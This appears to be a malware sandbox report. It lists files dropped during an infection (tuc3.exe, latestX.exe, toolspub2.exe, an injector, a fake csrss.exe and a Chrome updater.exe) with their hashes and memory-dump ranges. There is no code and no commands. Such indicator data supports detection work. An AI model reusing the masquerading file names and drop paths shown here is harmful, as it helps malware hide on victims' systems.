SHA256 a76eb793e43e9d6d4ee2a8688bf10bddfcb652a4a6444c068078aa2df12ecae4
SHA512 578bc1b982a777042807d140d145152a5df1535f6a44134715caab3bfbd2c82c804ee50c263a5cc249cbd93514186bc23c447da1a43638d4b619756ebab00381

memory/4820-55-0x00000000073A0000-0x0000000007944000-memory.dmp

memory/4820-58-0x0000000006E90000-0x0000000006F22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 613eebfb559936db1a7fa0efd93107f1
SHA1 d8b78eb2335c2900ce769df7affcaa4281005f1f
SHA256 c802dbc43848b2030ac2ca73f3e335618ebe852945b6ef0cd131bf0916ad5a78
SHA512 c731b4d8d8c556543c2a8c3c1c625014448e7ba48288d48c14e38431da7a4ecf63b6148de49c326fc9d5f445e74019f16fe0d4d12977f1e81264251cd3eba711

memory/1112-65-0x0000000002720000-0x0000000002721000-memory.dmp

memory/4820-69-0x0000000006E20000-0x0000000006E2A000-memory.dmp

memory/4820-70-0x0000000007010000-0x0000000007020000-memory.dmp

memory/472-68-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4820-73-0x0000000007F70000-0x0000000008588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 048466c9da400c26af9478d644a09345
SHA1 f85c75eaf4576ea80d6f4aac73e291af173b0616
SHA256 0be1db1713206b6f72aaa80a42423e1942ec79a06d32fd12170460f9963e485c
SHA512 5d8ea315782423a1d92a134973862dd9b689485c9afcbc21fc7edfd865876403d19c46d51c4cb188c228cee03565d86607c187a87a2f0be7fbe22f16c7f0b0b6

memory/4820-77-0x0000000007220000-0x000000000732A000-memory.dmp

memory/4820-86-0x0000000007110000-0x000000000714C000-memory.dmp

memory/4820-89-0x0000000007150000-0x000000000719C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-34MKO.tmp\tuc3.tmp

MD5 3316018729f251b9ab4cb4574e75c26b
SHA1 b2e31b2c7ec77cc4ef62eab51d8fbfd846482d96
SHA256 b368d7d0ccedf7be48d80450c832c6d2df6aa01bf0dcc8391ddc1017b2304a1f
SHA512 76179ac07d63b8e8f2c2d2abb90884b248496ee621bd735195ea5261d88344517faf1e267b3226f8a0d5338aa45114cb810fcc9b8d4f7e12db6ffa298dc4787a

memory/1216-106-0x0000000000710000-0x0000000000711000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-K8G16.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 5fbbe0b64ad52c17ac74fa1f49d9811d
SHA1 0b019d01f1a415b623ced1c86e5b682be8d78ac6
SHA256 4497c776f02968c9eab663fbd42d44c4f990f6860834b63cf55727b7453d40a8
SHA512 01ebf7d06372ac89db6629c209a20dc7dc6e287d685f2b6893946adeca10736c85d61f1ce3e9bbf655d3eb195f26ac8b6b0390c91ab580f358e763becb621255

memory/2632-235-0x0000000000400000-0x0000000000785000-memory.dmp

memory/392-243-0x0000000000400000-0x0000000000785000-memory.dmp

memory/392-242-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 de9f8710d671f56d71973722d5a690b6
SHA1 44e69806827a061cc6c09b489d65754b3ab22973
SHA256 92457c363e378f00ac1f4bceed979ba8da81c71c1ab188d17643e3d538007ec5
SHA512 58af66835208aeee38c4da12e566a9d40045dd24f567825166d7a008da0c0a0731800762c2b4e259c8028788bd78af91b31f45814b4bdced296b1fafa17d173f

memory/2632-238-0x0000000000400000-0x0000000000785000-memory.dmp

C:\ProgramData\SpaceRacesEX\SpaceRacesEX.exe

MD5 c3b32d3a368c427d11a3129cc8a25b2b
SHA1 bf1b4a9d5051ed40a8a257e56f6f6eab97aaf445
SHA256 f7799d08abe6d5fc6ba77ccf76a177513376a8ff8f8a089b1726aabc05e7c8f8
SHA512 b84924aa721f8c7332aee60af0b3fec410861df45e6461aaf5d73bfa35862fe2a3d54a3f65f6c86d55db27e80fa5c23d95a6d550841f6e5522ef5d6dd1fd8170

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 6b5fc1d8863b2b36bbbbfcd29d75c834
SHA1 b79da911eda57e569266d20fa2a49ea3f11d9024
SHA256 f0a0f3851048ebf9a30a5547e0737b890f758996bfed908889e6c7a09e3b32ea
SHA512 6bfab9acb04537c0e98037f68ccd7da617a61ae801ae7ca8a2609f4420a89040f4f0d5bb5ac8a2c409e63a5bf80d3c06322a59f7e4b3bb2448f5907259ba25c5

C:\Users\Admin\AppData\Local\Temp\is-K8G16.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/4572-88-0x0000000074F60000-0x0000000075710000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 a51dddeee26e5aad83e5a0f3c76e30a7
SHA1 87ea8b18521c3a1fc8eb1fde7f545d78a602fad2
SHA256 43b992a9875b7fc2aed6874888a7b8999cd671210514b0ea842864139668777d
SHA512 df6462ccee7c829d4d35805ae2286229b047f259ac83e354e91ceb1257ecba9c0feaf2f3dc3b8ee4f832874f73c7ce1a4c0518d1c18e710310c30d59f78d418a

C:\Users\Admin\AppData\Local\Temp\is-34MKO.tmp\tuc3.tmp

MD5 2c9a5b948423443c555eb17e9d7470f8
SHA1 ba2c389a25fdfe2ebdce2f76fe13dbcbb9bebc69
SHA256 a683b7a54d56875200a528483d3be93be2689bbaac97b0392f325e1511bc8bd9
SHA512 5a698d3552106241d2c247048c3602d00907f0fa53eb27dd9ff784755ab43040907cf554ccd0d57326ffc2d12d33797da80342a2c51ca045971ec3652f90c862

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 8d2ddfdef070b2d59f5e833e400506f4
SHA1 cdb2439125515c80ccb8bba206e50921d60dda99
SHA256 69133aff57140356e2e2d95e09e5b2eafb9bfbb8df546b0fb1614c2a09f5f69c
SHA512 5950acf3bd0c488c0cd1c9f544f2b39068ca359923b426669213c44eaa616017accdc895eaee87d967529afab843c2410676c10f56a07639ab9b64ae1f3c60cd

memory/4820-82-0x0000000006FA0000-0x0000000006FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 b578c320758d24e2026cce9869a3bbff
SHA1 b74d9b8dcbbc1e2b8cf5d84cc2f2a5794e261ef7
SHA256 21d541c72856e04cb8c4fcf9157ef42fbf9366ea84c4450e2f10d22175b5a647
SHA512 6224efb656ba912a891add5b29d9a7ec287b90fac9cb34c7692574173d49139a0479a08bdc9febd169dd7611bdd3f88113dce9fa886c66c8b0c5fee0cc405352

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d0d22d9d327842e98151b3adb8f72342
SHA1 dc51f1d03eb1d742f31a08aa36318cf57feba39d
SHA256 b97a941ca53af254e3afb89653d04bf388bbc211f6253df7595f599659bc5ad2
SHA512 8658470818b17334c750375ed5d7d9593542cbf893094f764829517e979d9c2309d4b701e79a530520c843e238992e110661603d58c34a46158727a1ea5a3cc9

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 cde750f39f58f1ec80ef41ce2f4f1db9
SHA1 942ea40349b0e5af7583fd34f4d913398a9c3b96
SHA256 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094
SHA512 c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580

memory/1792-247-0x0000000002E30000-0x000000000371B000-memory.dmp

memory/4820-248-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/1112-249-0x0000000002720000-0x0000000002721000-memory.dmp

memory/2156-251-0x00000000022D0000-0x00000000022D9000-memory.dmp

memory/1792-250-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2156-254-0x0000000000800000-0x0000000000900000-memory.dmp

memory/1140-257-0x0000000000400000-0x0000000000409000-memory.dmp

memory/472-256-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 bd0139cb5208bbc15037cd8ba6db2700
SHA1 e1158b26968d60c1b8aeabb34d468f8403eebfb1
SHA256 7361dde1e65a3b5b029b45ec9855e46aa2d92c198f1e18e7a2dc8aaf270a6060
SHA512 f6a1887319fdf3583b598db0530f8fa786bcacc629842014d437dacf4a4163220325ff784f19b019a13b5897689f8c34294e10c2f94129719426040326d6bc09

memory/1140-253-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4820-252-0x0000000007010000-0x0000000007020000-memory.dmp

memory/1792-246-0x0000000002A30000-0x0000000002E2D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 adae203df3e5fe8c4d994fbf3d173d38
SHA1 600a165248de48b619f7a4e5ee5a467107b22067
SHA256 e7ba3311c86b75799befdf3fcb21a9cbbe0a2a8fb16dc49cff235ac5bb470bda
SHA512 49b9cbf69a5ec1c6e4781188b5366951becff67a48001684a73dfe16ece9ff53cafe706c1eb86f1f0d3684f7d1a9b7cde20283d0c04187bbc89830e7daf2115e

memory/4948-258-0x0000000000C50000-0x0000000000C86000-memory.dmp

memory/4948-260-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/4948-261-0x0000000002720000-0x0000000002730000-memory.dmp

memory/4948-262-0x0000000002720000-0x0000000002730000-memory.dmp

memory/4948-263-0x0000000004C20000-0x0000000004C42000-memory.dmp

memory/4948-259-0x0000000004DC0000-0x00000000053E8000-memory.dmp

memory/4948-270-0x0000000004D30000-0x0000000004D96000-memory.dmp

memory/4948-275-0x0000000005630000-0x0000000005984000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vnhtzmbl.kvv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4948-264-0x0000000004CC0000-0x0000000004D26000-memory.dmp

memory/4948-276-0x00000000059F0000-0x0000000005A0E000-memory.dmp

memory/4948-277-0x0000000005F40000-0x0000000005F84000-memory.dmp

memory/4948-278-0x0000000006D00000-0x0000000006D76000-memory.dmp

memory/4948-280-0x0000000006DA0000-0x0000000006DBA000-memory.dmp

memory/4948-279-0x0000000007400000-0x0000000007A7A000-memory.dmp

memory/4948-284-0x000000007F060000-0x000000007F070000-memory.dmp

memory/4948-283-0x000000006D6C0000-0x000000006D70C000-memory.dmp

memory/4948-295-0x0000000006F90000-0x0000000006FAE000-memory.dmp

memory/392-296-0x0000000000400000-0x0000000000785000-memory.dmp

memory/4948-298-0x0000000002720000-0x0000000002730000-memory.dmp

memory/4948-299-0x00000000070A0000-0x00000000070AA000-memory.dmp

memory/4948-297-0x0000000006FB0000-0x0000000007053000-memory.dmp

memory/4948-285-0x000000006CEF0000-0x000000006D244000-memory.dmp

memory/392-282-0x0000000000400000-0x0000000000785000-memory.dmp

memory/4948-300-0x00000000071C0000-0x0000000007256000-memory.dmp

memory/4948-281-0x0000000006F50000-0x0000000006F82000-memory.dmp

memory/4948-301-0x00000000070C0000-0x00000000070D1000-memory.dmp

memory/4948-302-0x0000000007100000-0x000000000710E000-memory.dmp

memory/4948-303-0x0000000007120000-0x0000000007134000-memory.dmp

memory/4948-304-0x0000000007160000-0x000000000717A000-memory.dmp

memory/4948-305-0x0000000007150000-0x0000000007158000-memory.dmp

memory/4948-308-0x0000000074F60000-0x0000000075710000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 5130f249fdaaffcaadc4d49bc0ccba8c
SHA1 0e19bb7560f887a1d24d3d4f51ad2bb4e58f2e50
SHA256 265153dd6fb4f12c17826b55c13d1508c29de2fe5cdc2b33d389e8d4f094b1f7
SHA512 f2d1ca9bc1183e728360b057349f8bf212146bbdc308214e56f93785141238e934d5a83ca37ea804d7c97a4773cb03707f7bbf84233f48ccbb1a841ac625c2f2

memory/3324-310-0x0000000002FD0000-0x0000000002FE6000-memory.dmp

memory/1140-314-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1792-317-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1112-316-0x0000000000400000-0x0000000000965000-memory.dmp

memory/3236-321-0x0000000002A20000-0x0000000002E22000-memory.dmp

memory/1216-320-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/944-319-0x00007FF69F3D0000-0x00007FF69F971000-memory.dmp

memory/392-325-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6ead726d9e92316074aa470fe67bfa2d
SHA1 3057331c3d0ec9610e7617d4cd8fd280c84906c8
SHA256 6f4a0800eb700ee04a9392d6c3a7c40a750b51e376331729f175aa59e978ebe0
SHA512 0530671952abde699e0d8877e3bd0de2bb7de6b570647bc4e16b0a586d57857a7a0973489f4a2f763a296ed7afe2b7b3fe1424b542a29240740c89ce120c68a8

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 8a8f3d85099bec130ac6057bd3e6d61d
SHA1 3e8732ce3ea0d779cea67c404ba03ecc9030d152
SHA256 6e43e72ce156a1c6a203f9da03b679e84e84adad7e970bd06390f7256144260d
SHA512 e4554f08b06bcca947b598f332f1941fbde3d9c07bf88889fbf0a4025a6d577285daae25fd2859763aae970f088fe02bd1dc3d5d253470608d38d1c6ee9025d8

C:\Windows\rss\csrss.exe

MD5 a780d2fc785d4286097550510290356b
SHA1 33b5d79fbe92eb1f21ab0cb02415a197bc76838c
SHA256 cde43b14de4e09297118786e987899079856bf6c54406093a414c5c97a44f83e
SHA512 cfa732c943313e68250ed1dc96f70787734435d8eb72a84756565a9e06d03a11841c3e86f0146e291e34f5c7ec1c0df17353461c1e126d6597d9e82f4008b829

memory/3236-423-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 2b3b2717875db1ef24e974efbe84e4e4
SHA1 61e719c8389c5aca7975d8a4135909a7c9e3c668
SHA256 73434ce02e8554ce91b05da6775dfc1e43adfe108443b3b855bfdc2992369508
SHA512 af423dd32515143678c78f3fe9ec29dbba9a7e5e2b7b69fb5a180e0b5fdefdc8c2edf3906c008bb71cf423be3057e2d9dd246a47a6a08dab44af60498099bbbe

memory/232-424-0x0000000000370000-0x00000000003AC000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 4b90450476ff954d1e3d1381bf2cf58b
SHA1 8f4c1797d34646263d93a9f432defbaa229bfe8e
SHA256 a0fedf1af41c57a8ac9fe2eeb77fdabbf200cd984b12f04c2a6da6cb71070d45
SHA512 56b9870a6285b3624b20568c2a443c1a308a58be9fa23a84fc3b3549ec28c81881b29b0ba42d08efe58ca000810397343334e0825479ede54c271f4887da23f6

memory/392-449-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3510cf396fa37ff92b36e34bbff748bf
SHA1 0cec75a654661ca47cf3dc20249858e784f1341d
SHA256 3801dd5f06b2cc82e79409531575bc494cc924f6c0fcc33623fbd40ee986de80
SHA512 b83499b0abffe6905ebca61449e8f4120913891942462da456be35c1f3749c29748b1c399eab82fc7d8d5dbb1fb417130acda39b43dd7428894ee9101c19f5b7

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 680ca8b6ea006e93755e6202ea322f0c
SHA1 11399703cf8e13fb564f0a949e65c221eedf5931
SHA256 0d10a2523f60eeab7a6ee5ae397b4fc7eda0dcbe79ead47f84acad03fd061c6a
SHA512 81ff826eeede1ed1e6938894d4d3b2089606fc587b3c5a4549a7c327b4ec2a36411689b4841b90a313baee5fa5e783e1f0c9869c4ed742d5c2dcda3c78c0fbe7

C:\Users\Admin\AppData\Local\Temp\3467.exe

MD5 908b762092324061da2c4b9323477c6f
SHA1 7c6fc598759762d1620a6057c60f8b5575bf8b9b
SHA256 12342379f887ed3fc7ee284871dae28c8713669149e43b54eef7a15394897d65
SHA512 8585d4f53e295be8c270a6a7740c7a27cedf36ab5cae72867baa912cfc8ad3eba8d200fb0c99c1e3eee3265145fcb31d4f5538e2df166a36c49414af08444f02

C:\Users\Admin\AppData\Local\Temp\3467.exe

MD5 33e3a7580808cf433ddc48bcca014a2e
SHA1 7a5fccf50bc16e619079eec9fc527ba47fd0a7a8
SHA256 f749eaaabf42a7f2b72d994882cdd4191e4aa57502a4dec54e9371e8e88113b5
SHA512 776cc91676f7314e17b2df224ef2c9bf7bee5b6dca84ff10ce543e19f0716d97f9f7979a5f36524280918e6b18900fc2a4a9e699d50fb6076b0400b9b3e85589

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 95884387f54841993491a6ba750c79f9
SHA1 fa0324ab46478148efbeab322340e4416547e9af
SHA256 978a2be45c1b6084cfe9df677b2ca0b24c7efaacdd5bd2bb1d54dab33c156c16
SHA512 163cfe335363dbbedcd8930e846a084e7e6bf4ed1c4806e7c33dbc666566fe2baeeace9eacb04307912eb1c967f17a3b17f98a8084693e22915e6b730314537d

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d86506d0a5c6174c100cb95732b8dcab
SHA1 f6eab7a8fbb1ec947ef100e42351f9a0068ed188
SHA256 8c26b9edcbaa1eeb110323f3c1dec2db19c55e0c2cd0845a9441564816cdc735
SHA512 c46f7352698606db083a9bd10701d645b60a3827b8ee604546c82a57a8b82dbf64df03d5a4b6c86650151d367b6a08a27b47b67529b7c420b63ce7aab2b0778f

memory/1016-547-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/392-578-0x0000000000400000-0x0000000000785000-memory.dmp

memory/944-585-0x00007FF69F3D0000-0x00007FF69F971000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 5e5032296d50435725b3dbeab1ee3dba
SHA1 212c1bf92d18bd04f1bbcfcdb641881552660b94
SHA256 06f6fd83dfe8245ac6acdf50a762e406854af8f6f962be65fcfae87eeaf5b4a9
SHA512 1e82416120baf9bf880eecfc546565fc5c575f3e80365bc459ccce1befae0c3e220712683f24c4a94e899e69728f3f4ae7377538bf1f0a1121fb173e3ce4820f

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 924ad826a584e635f0801a8892204ab2
SHA1 13151ea62a21042235f08e4e4cf95ddb60ae2156
SHA256 f7dd9ac95e4f27a1af6bb3ec94612a252ab1ff5cf09c1f9ec74c16a03103d108
SHA512 4cb24bb2378085bc51897b0f412015d501f295c40739bf82b3f572911cd328c7bca63042bea66a5556ba417de3216f16fd0abe32d9fa9cf73179ca0f1cb30d42

C:\Users\Admin\AppData\Local\Temp\55AC.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155